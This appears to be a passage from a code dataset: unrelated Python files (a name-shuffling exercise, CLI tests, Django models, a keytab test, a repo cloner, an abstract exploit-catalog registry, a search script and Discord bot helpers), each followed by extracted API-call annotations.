'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/dk.itu.real.ooe.MinecraftService/fillCube"""', 'minecraft__pb2.FillCubeRequest.SerializeToString', 'google_dot_protobuf_dot_empty__pb2.Empty.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target,\n '/dk.itu.real.ooe.MinecraftService/fillCube', minecraft__pb2.\n FillCubeRequest.SerializeToString, google_dot_protobuf_dot_empty__pb2.\n Empty.FromString, options, channel_credentials, insecure,\n call_credentials, compression, wait_for_ready, timeout, metadata)\n", (5176, 5466), False, 'import grpc\n')]
|
# SORTEANDO UMA ORDEM NA LISTA
# O mesmo professor do ex 19 quer sortear a ordem de apresentação de trabalhos dos alunos. Faça um programa que leia o nome dos quatro alunos e mostre a ordem sorteada.
from random import sample, choice
a1 = input('Digite o nome do primeiro aluno: ')
a2 = input('Digite o nome do segundo aluno: ')
a3 = input('Digite o nome do terceiro aluno: ')
a4 = input('Digite o nome do quarto aluno: ')
lista = [a1, a2, a3, a4]
print(f'A ordem de apresentação sera a seguinte:{sample((lista),k=4)}')
|
[
"random.sample"
] |
[((504, 522), 'random.sample', 'sample', (['lista'], {'k': '(4)'}), '(lista, k=4)\n', (510, 522), False, 'from random import sample, choice\n')]
|
from tests.cli import commands
from click.testing import CliRunner
def test_get_not_found():
"""
Executes the kv get <key> command. The key does not exist yet so it
returns the Key Doesn't exist message and status_code. It validates
the output.
"""
runner = CliRunner()
result = runner.invoke(commands, ['get', 'lamsbda'])
expected_value = '{"status_code": 404, "error": "Key Doesn\'t exist"}\n\n'
assert result.exit_code == 0
assert result.output == expected_value
def test_put_value():
"""
Executes the kv put <key> <value> command. This puts the pair in the
key value store. Then we check the output as it should return a json
of the key-value pair.
"""
runner = CliRunner()
testPut = runner.invoke(commands, ['put', 'key1', 'value1'])
assert testPut.exit_code == 0
assert testPut.output == '{"key1": "value1"}\n\n'
def test_get_value():
"""
Executes kv get <key> command again but this time we check for the
key which we have added in above step. This validates the put
sub command as well.
"""
runner = CliRunner()
testGet = runner.invoke(commands, ['get', 'key1'])
assert testGet.exit_code == 0
assert testGet.output == '{"value": "value1"}\n\n'
|
[
"click.testing.CliRunner"
] |
[((284, 295), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (293, 295), False, 'from click.testing import CliRunner\n'), ((734, 745), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (743, 745), False, 'from click.testing import CliRunner\n'), ((1114, 1125), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (1123, 1125), False, 'from click.testing import CliRunner\n')]
|
import os
import hashlib
import secrets
from django.db import models
from django.core.cache import cache
from django.db.models.signals import pre_save, pre_delete, post_migrate
from django.conf import settings
from django.contrib.auth.models import User
from django.contrib.postgres.fields import JSONField, ArrayField
def import_class(name):
components = name.split('.')
mod = __import__(components[0])
for comp in components[1:]:
mod = getattr(mod, comp)
return mod
class UserEntityBind(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='entities')
entity = models.CharField(max_length=64)
class Meta:
unique_together = ('entity', 'user')
class Ledger(models.Model):
entity = models.CharField(max_length=64, db_index=True, null=True)
name = models.CharField(max_length=512, db_index=True)
metadata = JSONField(null=True, default=None)
participants = ArrayField(models.CharField(max_length=128), null=True)
class Meta:
unique_together = ('entity', 'name')
class Transaction(models.Model):
ledger = models.ForeignKey(Ledger, on_delete=models.CASCADE)
txn = JSONField()
seq_no = models.IntegerField(null=True)
metadata = JSONField(null=True, default=None)
created = models.DateTimeField(auto_now_add=True, db_index=True, null=True)
actor_entity = models.CharField(max_length=64, db_index=True, null=True)
class Meta:
unique_together = ('seq_no', 'ledger')
class GURecord(models.Model):
entity = models.CharField(max_length=64, db_index=True)
category = models.CharField(max_length=36, db_index=True)
no = models.CharField(max_length=128)
date = models.CharField(max_length=128)
cargo_name = models.CharField(max_length=128)
depart_station = models.CharField(max_length=128)
arrival_station = models.CharField(max_length=128)
month = models.CharField(max_length=128)
year = models.CharField(max_length=128)
decade = models.CharField(max_length=128)
tonnage = models.CharField(max_length=128)
shipper = models.CharField(max_length=128)
attachments = JSONField()
class Content(models.Model):
STORAGE_FILE_SYSTEM = 'django.core.files.storage.FileSystemStorage'
SUPPORTED_STORAGE = [
(STORAGE_FILE_SYSTEM, 'FileSystemStorage'),
]
id = models.CharField(max_length=128, db_index=True)
uid = models.CharField(max_length=128, primary_key=True)
entity = models.CharField(max_length=1024, null=True, db_index=True)
name = models.CharField(max_length=512, db_index=True)
content_type = models.CharField(max_length=1024, null=True, db_index=True)
storage = models.CharField(max_length=256, db_index=True, choices=SUPPORTED_STORAGE, default=STORAGE_FILE_SYSTEM)
created = models.DateTimeField(null=True, auto_now_add=True)
updated = models.DateTimeField(null=True, auto_now=True)
is_avatar = models.BooleanField(default=False)
size_width = models.IntegerField(null=True)
size_height = models.IntegerField(null=True)
delete_after_download = models.BooleanField(default=False, db_index=True)
encoded = models.BooleanField(default=False, db_index=True)
download_counter = models.IntegerField(default=0, db_index=True)
md5 = models.CharField(max_length=128, null=True)
@property
def url(self):
return settings.MEDIA_URL + self.uid
def get_storage_instance(self):
cls = import_class(self.storage)
return cls()
def set_file(self, file):
self.name = file.name
self.content_type = file.content_type
_, ext = os.path.splitext(file.name.lower())
self.id = secrets.token_hex(16)
self.uid = self.id + ext
self.get_storage_instance().save(self.uid, file)
file.seek(0)
content = file.read()
self.md5 = hashlib.md5(content).hexdigest()
self.entity = settings.AGENT['entity']
pass
def delete(self, using=None, keep_parents=False):
try:
self.get_storage_instance().delete(self.uid)
except NotImplementedError:
pass
super().delete(using, keep_parents)
class Token(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
created = models.DateTimeField(auto_now_add=True)
value = models.CharField(max_length=128, db_index=True)
entity = models.CharField(max_length=1024, db_index=True)
@staticmethod
def allocate(user: User):
inst = Token.objects.create(
user=user,
value=secrets.token_hex(16),
entity=settings.AGENT['entity']
)
return inst
def clear_txn_caches(instance, *args, **kwargs):
cache.delete(settings.INBOX_CACHE_KEY)
cache.delete(settings.LEDGERS_CACHE_KEY)
pre_save.connect(clear_txn_caches, sender=Ledger)
pre_save.connect(clear_txn_caches, sender=Transaction)
pre_delete.connect(clear_txn_caches, sender=Ledger)
pre_delete.connect(clear_txn_caches, sender=Transaction)
post_migrate.connect(clear_txn_caches, sender=Ledger)
post_migrate.connect(clear_txn_caches, sender=Transaction)
|
[
"django.db.models.signals.pre_save.connect",
"django.db.models.signals.post_migrate.connect",
"hashlib.md5",
"django.db.models.CharField",
"django.db.models.ForeignKey",
"secrets.token_hex",
"django.db.models.BooleanField",
"django.db.models.signals.pre_delete.connect",
"django.contrib.postgres.fields.JSONField",
"django.db.models.IntegerField",
"django.core.cache.cache.delete",
"django.db.models.DateTimeField"
] |
[((4827, 4876), 'django.db.models.signals.pre_save.connect', 'pre_save.connect', (['clear_txn_caches'], {'sender': 'Ledger'}), '(clear_txn_caches, sender=Ledger)\n', (4843, 4876), False, 'from django.db.models.signals import pre_save, pre_delete, post_migrate\n'), ((4877, 4931), 'django.db.models.signals.pre_save.connect', 'pre_save.connect', (['clear_txn_caches'], {'sender': 'Transaction'}), '(clear_txn_caches, sender=Transaction)\n', (4893, 4931), False, 'from django.db.models.signals import pre_save, pre_delete, post_migrate\n'), ((4932, 4983), 'django.db.models.signals.pre_delete.connect', 'pre_delete.connect', (['clear_txn_caches'], {'sender': 'Ledger'}), '(clear_txn_caches, sender=Ledger)\n', (4950, 4983), False, 'from django.db.models.signals import pre_save, pre_delete, post_migrate\n'), ((4984, 5040), 'django.db.models.signals.pre_delete.connect', 'pre_delete.connect', (['clear_txn_caches'], {'sender': 'Transaction'}), '(clear_txn_caches, sender=Transaction)\n', (5002, 5040), False, 'from django.db.models.signals import pre_save, pre_delete, post_migrate\n'), ((5041, 5094), 'django.db.models.signals.post_migrate.connect', 'post_migrate.connect', (['clear_txn_caches'], {'sender': 'Ledger'}), '(clear_txn_caches, sender=Ledger)\n', (5061, 5094), False, 'from django.db.models.signals import pre_save, pre_delete, post_migrate\n'), ((5095, 5153), 'django.db.models.signals.post_migrate.connect', 'post_migrate.connect', (['clear_txn_caches'], {'sender': 'Transaction'}), '(clear_txn_caches, sender=Transaction)\n', (5115, 5153), False, 'from django.db.models.signals import pre_save, pre_delete, post_migrate\n'), ((544, 618), 'django.db.models.ForeignKey', 'models.ForeignKey', (['User'], {'on_delete': 'models.CASCADE', 'related_name': '"""entities"""'}), "(User, on_delete=models.CASCADE, related_name='entities')\n", (561, 618), False, 'from django.db import models\n'), ((632, 663), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(64)'}), '(max_length=64)\n', (648, 663), False, 'from django.db import models\n'), ((769, 826), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(64)', 'db_index': '(True)', 'null': '(True)'}), '(max_length=64, db_index=True, null=True)\n', (785, 826), False, 'from django.db import models\n'), ((838, 885), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(512)', 'db_index': '(True)'}), '(max_length=512, db_index=True)\n', (854, 885), False, 'from django.db import models\n'), ((901, 935), 'django.contrib.postgres.fields.JSONField', 'JSONField', ([], {'null': '(True)', 'default': 'None'}), '(null=True, default=None)\n', (910, 935), False, 'from django.contrib.postgres.fields import JSONField, ArrayField\n'), ((1121, 1172), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Ledger'], {'on_delete': 'models.CASCADE'}), '(Ledger, on_delete=models.CASCADE)\n', (1138, 1172), False, 'from django.db import models\n'), ((1183, 1194), 'django.contrib.postgres.fields.JSONField', 'JSONField', ([], {}), '()\n', (1192, 1194), False, 'from django.contrib.postgres.fields import JSONField, ArrayField\n'), ((1208, 1238), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'null': '(True)'}), '(null=True)\n', (1227, 1238), False, 'from django.db import models\n'), ((1254, 1288), 'django.contrib.postgres.fields.JSONField', 'JSONField', ([], {'null': '(True)', 'default': 'None'}), '(null=True, default=None)\n', (1263, 1288), False, 'from django.contrib.postgres.fields import JSONField, ArrayField\n'), ((1303, 1368), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'db_index': '(True)', 'null': '(True)'}), '(auto_now_add=True, db_index=True, null=True)\n', (1323, 1368), False, 'from django.db import models\n'), ((1388, 1445), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(64)', 'db_index': '(True)', 'null': '(True)'}), '(max_length=64, db_index=True, null=True)\n', (1404, 1445), False, 'from django.db import models\n'), ((1555, 1601), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(64)', 'db_index': '(True)'}), '(max_length=64, db_index=True)\n', (1571, 1601), False, 'from django.db import models\n'), ((1617, 1663), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(36)', 'db_index': '(True)'}), '(max_length=36, db_index=True)\n', (1633, 1663), False, 'from django.db import models\n'), ((1673, 1705), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (1689, 1705), False, 'from django.db import models\n'), ((1717, 1749), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (1733, 1749), False, 'from django.db import models\n'), ((1767, 1799), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (1783, 1799), False, 'from django.db import models\n'), ((1821, 1853), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (1837, 1853), False, 'from django.db import models\n'), ((1876, 1908), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (1892, 1908), False, 'from django.db import models\n'), ((1921, 1953), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (1937, 1953), False, 'from django.db import models\n'), ((1965, 1997), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (1981, 1997), False, 'from django.db import models\n'), ((2011, 2043), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (2027, 2043), False, 'from django.db import models\n'), ((2058, 2090), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (2074, 2090), False, 'from django.db import models\n'), ((2105, 2137), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (2121, 2137), False, 'from django.db import models\n'), ((2156, 2167), 'django.contrib.postgres.fields.JSONField', 'JSONField', ([], {}), '()\n', (2165, 2167), False, 'from django.contrib.postgres.fields import JSONField, ArrayField\n'), ((2366, 2413), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)', 'db_index': '(True)'}), '(max_length=128, db_index=True)\n', (2382, 2413), False, 'from django.db import models\n'), ((2424, 2474), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)', 'primary_key': '(True)'}), '(max_length=128, primary_key=True)\n', (2440, 2474), False, 'from django.db import models\n'), ((2488, 2547), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(1024)', 'null': '(True)', 'db_index': '(True)'}), '(max_length=1024, null=True, db_index=True)\n', (2504, 2547), False, 'from django.db import models\n'), ((2559, 2606), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(512)', 'db_index': '(True)'}), '(max_length=512, db_index=True)\n', (2575, 2606), False, 'from django.db import models\n'), ((2626, 2685), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(1024)', 'null': '(True)', 'db_index': '(True)'}), '(max_length=1024, null=True, db_index=True)\n', (2642, 2685), False, 'from django.db import models\n'), ((2700, 2807), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(256)', 'db_index': '(True)', 'choices': 'SUPPORTED_STORAGE', 'default': 'STORAGE_FILE_SYSTEM'}), '(max_length=256, db_index=True, choices=SUPPORTED_STORAGE,\n default=STORAGE_FILE_SYSTEM)\n', (2716, 2807), False, 'from django.db import models\n'), ((2818, 2868), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'null': '(True)', 'auto_now_add': '(True)'}), '(null=True, auto_now_add=True)\n', (2838, 2868), False, 'from django.db import models\n'), ((2883, 2929), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'null': '(True)', 'auto_now': '(True)'}), '(null=True, auto_now=True)\n', (2903, 2929), False, 'from django.db import models\n'), ((2946, 2980), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (2965, 2980), False, 'from django.db import models\n'), ((2998, 3028), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'null': '(True)'}), '(null=True)\n', (3017, 3028), False, 'from django.db import models\n'), ((3047, 3077), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'null': '(True)'}), '(null=True)\n', (3066, 3077), False, 'from django.db import models\n'), ((3106, 3155), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)', 'db_index': '(True)'}), '(default=False, db_index=True)\n', (3125, 3155), False, 'from django.db import models\n'), ((3170, 3219), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)', 'db_index': '(True)'}), '(default=False, db_index=True)\n', (3189, 3219), False, 'from django.db import models\n'), ((3243, 3288), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)', 'db_index': '(True)'}), '(default=0, db_index=True)\n', (3262, 3288), False, 'from django.db import models\n'), ((3299, 3342), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)', 'null': '(True)'}), '(max_length=128, null=True)\n', (3315, 3342), False, 'from django.db import models\n'), ((4236, 4285), 'django.db.models.ForeignKey', 'models.ForeignKey', (['User'], {'on_delete': 'models.CASCADE'}), '(User, on_delete=models.CASCADE)\n', (4253, 4285), False, 'from django.db import models\n'), ((4300, 4339), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (4320, 4339), False, 'from django.db import models\n'), ((4352, 4399), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)', 'db_index': '(True)'}), '(max_length=128, db_index=True)\n', (4368, 4399), False, 'from django.db import models\n'), ((4413, 4461), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(1024)', 'db_index': '(True)'}), '(max_length=1024, db_index=True)\n', (4429, 4461), False, 'from django.db import models\n'), ((4741, 4779), 'django.core.cache.cache.delete', 'cache.delete', (['settings.INBOX_CACHE_KEY'], {}), '(settings.INBOX_CACHE_KEY)\n', (4753, 4779), False, 'from django.core.cache import cache\n'), ((4784, 4824), 'django.core.cache.cache.delete', 'cache.delete', (['settings.LEDGERS_CACHE_KEY'], {}), '(settings.LEDGERS_CACHE_KEY)\n', (4796, 4824), False, 'from django.core.cache import cache\n'), ((966, 998), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (982, 998), False, 'from django.db import models\n'), ((3699, 3720), 'secrets.token_hex', 'secrets.token_hex', (['(16)'], {}), '(16)\n', (3716, 3720), False, 'import secrets\n'), ((3881, 3901), 'hashlib.md5', 'hashlib.md5', (['content'], {}), '(content)\n', (3892, 3901), False, 'import hashlib\n'), ((4589, 4610), 'secrets.token_hex', 'secrets.token_hex', (['(16)'], {}), '(16)\n', (4606, 4610), False, 'import secrets\n')]
|
"""Unit test for keytabs
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import io
import os
import shutil
import tempfile
import unittest
import mock
from treadmill import keytabs
class KeytabsTest(unittest.TestCase):
"""test keytabs function
"""
def setUp(self):
self.spool_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.spool_dir)
def _touch_file(self, name):
with io.open(os.path.join(self.spool_dir, name), 'w'):
pass
@mock.patch('treadmill.subproc.check_call')
def test_add_keytabs_to_file(self, mock_check_call):
"""test add keytabs princ files into dest file
"""
self._touch_file('HTTP#foo@realm')
self._touch_file('HTTP#bar@realm')
self._touch_file('host#foo@realm')
self._touch_file('host#bar@realm')
keytabs.add_keytabs_to_file(self.spool_dir, 'host', 'krb5.keytab')
try:
mock_check_call.assert_called_once_with(
[
'kt_add', 'krb5.keytab',
os.path.join(self.spool_dir, 'host#foo@realm'),
os.path.join(self.spool_dir, 'host#bar@realm'),
]
)
except AssertionError:
# then should called with files in other order
mock_check_call.assert_called_once_with(
[
'kt_add', 'krb5.keytab',
os.path.join(self.spool_dir, 'host#bar@realm'),
os.path.join(self.spool_dir, 'host#foo@realm'),
]
)
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"treadmill.keytabs.add_keytabs_to_file",
"mock.patch",
"tempfile.mkdtemp",
"shutil.rmtree",
"os.path.join"
] |
[((616, 658), 'mock.patch', 'mock.patch', (['"""treadmill.subproc.check_call"""'], {}), "('treadmill.subproc.check_call')\n", (626, 658), False, 'import mock\n'), ((1735, 1750), 'unittest.main', 'unittest.main', ([], {}), '()\n', (1748, 1750), False, 'import unittest\n'), ((414, 432), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (430, 432), False, 'import tempfile\n'), ((466, 495), 'shutil.rmtree', 'shutil.rmtree', (['self.spool_dir'], {}), '(self.spool_dir)\n', (479, 495), False, 'import shutil\n'), ((964, 1030), 'treadmill.keytabs.add_keytabs_to_file', 'keytabs.add_keytabs_to_file', (['self.spool_dir', '"""host"""', '"""krb5.keytab"""'], {}), "(self.spool_dir, 'host', 'krb5.keytab')\n", (991, 1030), False, 'from treadmill import keytabs\n'), ((551, 585), 'os.path.join', 'os.path.join', (['self.spool_dir', 'name'], {}), '(self.spool_dir, name)\n', (563, 585), False, 'import os\n'), ((1180, 1226), 'os.path.join', 'os.path.join', (['self.spool_dir', '"""host#foo@realm"""'], {}), "(self.spool_dir, 'host#foo@realm')\n", (1192, 1226), False, 'import os\n'), ((1248, 1294), 'os.path.join', 'os.path.join', (['self.spool_dir', '"""host#bar@realm"""'], {}), "(self.spool_dir, 'host#bar@realm')\n", (1260, 1294), False, 'import os\n'), ((1554, 1600), 'os.path.join', 'os.path.join', (['self.spool_dir', '"""host#bar@realm"""'], {}), "(self.spool_dir, 'host#bar@realm')\n", (1566, 1600), False, 'import os\n'), ((1622, 1668), 'os.path.join', 'os.path.join', (['self.spool_dir', '"""host#foo@realm"""'], {}), "(self.spool_dir, 'host#foo@realm')\n", (1634, 1668), False, 'import os\n')]
|
"""
The MIT License (MIT)
Copyright (c) 2015 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import json
import os
import subprocess
from urllib import request
repo_sources = [
'https://api.github.com/users/Akaito/repos?type=all',
]
class Repo:
@classmethod
def from_github_json(cls, jsn):
r = cls()
r.name = jsn['name']
r.title = r.name[len('codesaru-environ_project_'):]
r.description = jsn['description']
r.clone_url = jsn['clone_url']
return r
def __repr__(self):
return self.title
def find_repos(jsn):
repos = []
for repo_jsn in jsn:
r = Repo.from_github_json(repo_jsn)
if r is None:
continue
if 'codesaru-environ_project_' not in r.name:
continue
repos.append(r)
return repos
def main():
global repo_sources
repos = []
for repo_source_url in repo_sources:
response = request.urlopen(repo_source_url)
response_content = response.read()
repos_jsn = json.loads(response_content.decode())
repos.extend(find_repos(repos_jsn))
# present list of codesaru-environ/project compatible repos
for i in range(len(repos)):
print(i + 1, '--', repos[i].title)
print(' ', repos[i].description)
user_choice = 0
while int(user_choice) < 1 or int(user_choice) > len(repos):
user_choice = input('Enter project number to download: ')
user_choice = int(user_choice) - 1
repo = repos[user_choice]
subprocess.call(['git', 'clone', repo.clone_url, repo.title])
if __name__ == "__main__":
prior_dir = os.getcwd()
main()
os.chdir(prior_dir)
|
[
"os.getcwd",
"subprocess.call",
"os.chdir",
"urllib.request.urlopen"
] |
[((2342, 2403), 'subprocess.call', 'subprocess.call', (["['git', 'clone', repo.clone_url, repo.title]"], {}), "(['git', 'clone', repo.clone_url, repo.title])\n", (2357, 2403), False, 'import subprocess\n'), ((2445, 2456), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2454, 2456), False, 'import os\n'), ((2466, 2485), 'os.chdir', 'os.chdir', (['prior_dir'], {}), '(prior_dir)\n', (2474, 2485), False, 'import os\n'), ((1812, 1844), 'urllib.request.urlopen', 'request.urlopen', (['repo_source_url'], {}), '(repo_source_url)\n', (1827, 1844), False, 'from urllib import request\n')]
|
from django.contrib import admin
# Register your models here.
from .models import Payment, ContractFile, Company, Contractor
@admin.register(Company)
class Company(admin.ModelAdmin):
list_display = (
'name',
)
@admin.register(Contractor)
class Contractor(admin.ModelAdmin):
list_display = (
'name',
)
|
[
"django.contrib.admin.register"
] |
[((130, 153), 'django.contrib.admin.register', 'admin.register', (['Company'], {}), '(Company)\n', (144, 153), False, 'from django.contrib import admin\n'), ((233, 259), 'django.contrib.admin.register', 'admin.register', (['Contractor'], {}), '(Contractor)\n', (247, 259), False, 'from django.contrib import admin\n')]
|
import asyncio
import inspect
import logging
from abc import ABC, abstractclassmethod
from collections import defaultdict
from typing import Callable, Set, Type, Dict, List, Union
from json import JSONEncoder
class Exploit(ABC):
@abstractclassmethod
def generate_payload(command: str) -> Union[str, List[str]]:
pass
@abstractclassmethod
def run_payload(payload: str) -> None:
pass
vulnerable_function: Union[Callable, str] = None
source: str = ""
category_name: str = ""
notes: str = ""
@classmethod
def get_vulnerable_function_fqn(cls):
return (
cls.vulnerable_function
if isinstance(cls.vulnerable_function, str)
else (
cls.vulnerable_function.__module__
+ "."
+ cls.vulnerable_function.__qualname__
)
)
class AsyncEventLoop:
def __enter__(self):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
return self.loop
def __exit__(self, *args):
self.loop.close()
class ExploitEncoder(JSONEncoder):
def default(self, exploit: Exploit):
if not issubclass(exploit, Exploit):
super().default(exploit)
return {
"vulnerable_function": exploit.get_vulnerable_function_fqn(),
"source": exploit.source,
"category_name": exploit.category_name,
"notes": exploit.notes,
}
def get_exploits_by_category() -> Dict[str, Type[Exploit]]:
exploits_by_category = defaultdict(list)
for exploit in get_exploits():
exploits_by_category[exploit.category_name].append(exploit)
return exploits_by_category
def get_exploit(class_name: str) -> Type[Exploit]:
return next(exploit for exploit in get_exploits() if exploit.__name__ == class_name)
def get_exploits(starting_class: Type[Exploit] = Exploit, exclude_abstract=True) -> Set[Type[Exploit]]:
subclasses = set()
parents_to_process = [starting_class]
while parents_to_process:
parent = parents_to_process.pop()
for child in parent.__subclasses__():
if child not in subclasses:
subclasses.add(child)
parents_to_process.append(child)
if exclude_abstract:
subclasses = set(filter(lambda cls: not inspect.isabstract(cls), subclasses))
return subclasses
|
[
"collections.defaultdict",
"asyncio.set_event_loop",
"inspect.isabstract",
"asyncio.new_event_loop"
] |
[((1573, 1590), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (1584, 1590), False, 'from collections import defaultdict\n'), ((948, 972), 'asyncio.new_event_loop', 'asyncio.new_event_loop', ([], {}), '()\n', (970, 972), False, 'import asyncio\n'), ((981, 1014), 'asyncio.set_event_loop', 'asyncio.set_event_loop', (['self.loop'], {}), '(self.loop)\n', (1003, 1014), False, 'import asyncio\n'), ((2359, 2382), 'inspect.isabstract', 'inspect.isabstract', (['cls'], {}), '(cls)\n', (2377, 2382), False, 'import inspect\n')]
|
import os
from google_search import GoogleCustomSearch
#set variables
os.environ["SEARCH_ENGINE_ID"] = "000839040200690289140:u2lurwk5tko"
os.environ["GOOGLE_CLOUD_API_KEY"] = "<KEY>"
SEARCH_ENGINE_ID = os.environ['SEARCH_ENGINE_ID']
API_KEY = os.environ['GOOGLE_CLOUD_API_KEY']
api = GoogleCustomSearch(SEARCH_ENGINE_ID, API_KEY)
print("we got here\n")
#for result in api.search('prayer', 'https://cse.google.com/cse/publicurl?cx=000839040200690289140:u2lurwk5tko'):
for result in api.search('pdf', 'http://scraperwiki.com'):
print(result['title'])
print(result['link'])
print(result['snippet'])
|
[
"google_search.GoogleCustomSearch"
] |
[((315, 360), 'google_search.GoogleCustomSearch', 'GoogleCustomSearch', (['SEARCH_ENGINE_ID', 'API_KEY'], {}), '(SEARCH_ENGINE_ID, API_KEY)\n', (333, 360), False, 'from google_search import GoogleCustomSearch\n')]
|
# Import needed libraries
import discord
import os
import pymongo
import pendulum
import requests
import re
if os.path.exists("env.py"):
import env
# Define Environment Variables
MONGO_DBNAME = os.environ.get("MONGO_DBNAME")
MONGO_URI = os.environ.get("MONGO_URI")
MONGO_CONN = pymongo.MongoClient(MONGO_URI)
MONGO = pymongo.MongoClient(MONGO_URI)[MONGO_DBNAME]
# Get Existing Server League Object from Mongo
def get_existing_league(message):
existing_league = MONGO.servers.find_one(
{"server": str(message.guild.id)})
MONGO_CONN.close()
return existing_league
# Get Existing Player Object from Mongo
def get_existing_player(first_name, last_name, team_abbreviation):
existing_player = MONGO.players.find_one(
{"name": re.compile(f'{first_name} {last_name}', re.IGNORECASE), "team": re.compile(team_abbreviation, re.IGNORECASE)})
MONGO_CONN.close()
return existing_player
# Get All Server Objects from Mongo
def get_all_servers():
servers = MONGO.servers.find(
{})
MONGO_CONN.close()
return servers
# Set Embed for Discord Bot Responses
def my_embed(title, description, color, name, value, inline, bot):
embed = discord.Embed(title=title, description=description, color=color)
embed.add_field(name=name, value=value, inline=inline)
embed.set_author(name='Sleeper-FFL', icon_url=bot.user.display_avatar)
return embed
# Get Current Week
def get_current_week():
today = pendulum.today(tz='America/New_York')
nfl_state = requests.get(
'https://api.sleeper.app/v1/state/nfl'
)
nfl_date_list = nfl_state.json()["season_start_date"].split("-")
starting_week = pendulum.datetime(int(nfl_date_list[0]), int(nfl_date_list[1]), int(nfl_date_list[2]), tz='America/New_York')
if starting_week.is_future():
future = True
week = 1
else:
future = False
week = today.diff(starting_week).in_weeks() + 1
return week, future
# Check if a Server Has Patron Status
def is_patron(existing_league):
if "patron" in existing_league:
if existing_league["patron"] == "1":
return True
else:
return False
else:
return False
|
[
"pymongo.MongoClient",
"discord.Embed",
"os.path.exists",
"os.environ.get",
"pendulum.today",
"requests.get",
"re.compile"
] |
